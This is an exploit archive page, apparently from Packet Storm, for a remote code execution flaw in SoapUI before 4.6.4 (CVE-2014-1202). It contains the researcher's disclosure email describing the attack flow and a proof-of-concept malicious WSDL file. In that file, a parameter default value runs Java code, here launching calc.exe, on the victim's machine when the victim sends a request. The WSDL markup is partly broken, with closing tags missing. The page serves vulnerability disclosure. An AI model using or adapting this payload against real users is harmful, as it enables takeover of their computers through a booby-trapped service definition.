exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

SoapUI Remote Code Execution

SoapUI Remote Code Execution
Posted Jan 14, 2014
Authored by Barak Tawily

SoapUI versions prior to 4.6.4 suffer from a remote code execution vulnerability.

tags | exploit, remote, code execution
advisories | CVE-2014-1202
SHA-256 | fdafc7da1814b9291ce4fb8a036001c106992cd441f8dafe7c706b07de221cbf

SoapUI Remote Code Execution

Change Mirror Download
# Exploit Title: SoapUI Remote Code Execution
# Date: 25.12.13
# Exploit Author: Barak Tawily
# Vendor Homepage: <http://www.soapui.org/> http://www.soapui.org/
# Software Link:
# Version: vulnerable before 4.6.4
# Tested on: Windows, should work at Linux as well
# CVE : CVE-2014-1202

Hey guys.

My name is Barak Tawily, I work for Appsec-Labs as information security

I have been found remote code execution vulnerability in the SoapUI product,
which allows me to execute a java code to the victim's computer via
malicious WSDL/WADL file.

This vulnerability allows attacker to execute java code to any client's
machine that will use my WSDL file and will try to send request to the
remote server.

SoapUI allows the client execute code by entering a java code inside the
following tag, the java code will be executed when the client will try to
send request to the server:


Thus, an attacker can make a malicious WSDL file, determine a malicious java
code as default value in one of the requests parameters, hence, when client
uses malicious WSDL file and will try to send a request the java code will
be executed.

The attack flow is:

1. The attacker makes a malicious web service with fake WSDL including
the java payload that will be executed on the victim.

2. The victim enters the soapUI program and will enter the malicious
WSDL address.

3. The victim decides to send a request to the server, and the java
code executed on the victim's machine.

4. The attacker succeed execute java code in the victim's machine, and
will take over it.

This vulnerability was check on the version (4.6.3), a proof of concept
video can be found at: http://www.youtube.com/watch?v=3lCLE64rsc0

malicious WSDL is attached.

Please let me know if the vulnerability is about to publish

Thanks, Barak.

<?xml version="1.0"?>
<definitions name="StockQuote"

<schema targetNamespace="http://example.com/stockquote.xsd"
<element name="Payload" default="${=Runtime.getRuntime().exec('calc.exe')};" type="string">
<element name="tickerSymbol" type="string"/>
<element name="TradePrice">
<element name="price" type="float"/>

<message name="GetLastTradePriceInput">
<part name="body" element="xsd1:Payload"/>

<message name="GetLastTradePriceOutput">
<part name="body" element="xsd1:TradePrice"/>

<portType name="StockQuotePortType">
<operation name="Malicious_Request">
<input message="tns:GetLastTradePriceInput"/>
<output message="tns:GetLastTradePriceOutput"/>

<binding name="Exploit" type="tns:StockQuotePortType">
<soap:binding style="document" transport="http://schemas.xmlsoap.org/soap/http"/>
<operation name="Malicious_Request">
<soap:operation soapAction="http://example.com/GetLastTradePrice"/>
<soap:body use="literal"/>
<soap:body use="literal"/>

<service name="StockQuoteService">
<documentation>My first service</documentation>
<port name="StockQuotePort" binding="tns:StockQuoteSoapBinding">
<soap:address location="http://example.com/stockquote"/>


Login or Register to add favorites

File Archive:

November 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    1 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    0 Files
  • 5
    Nov 5th
    0 Files
  • 6
    Nov 6th
    0 Files
  • 7
    Nov 7th
    0 Files
  • 8
    Nov 8th
    0 Files
  • 9
    Nov 9th
    0 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    219 Files
  • 14
    Nov 14th
    19 Files
  • 15
    Nov 15th
    66 Files
  • 16
    Nov 16th
    38 Files
  • 17
    Nov 17th
    9 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    11 Files
  • 22
    Nov 22nd
    56 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    36 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    14 Files
  • 28
    Nov 28th
    30 Files
  • 29
    Nov 29th
    35 Files
  • 30
    Nov 30th
    25 Files

Top Authors In Last 30 Days

File Tags


packet storm

© 2022 Packet Storm. All rights reserved.

Security Services
Hosting By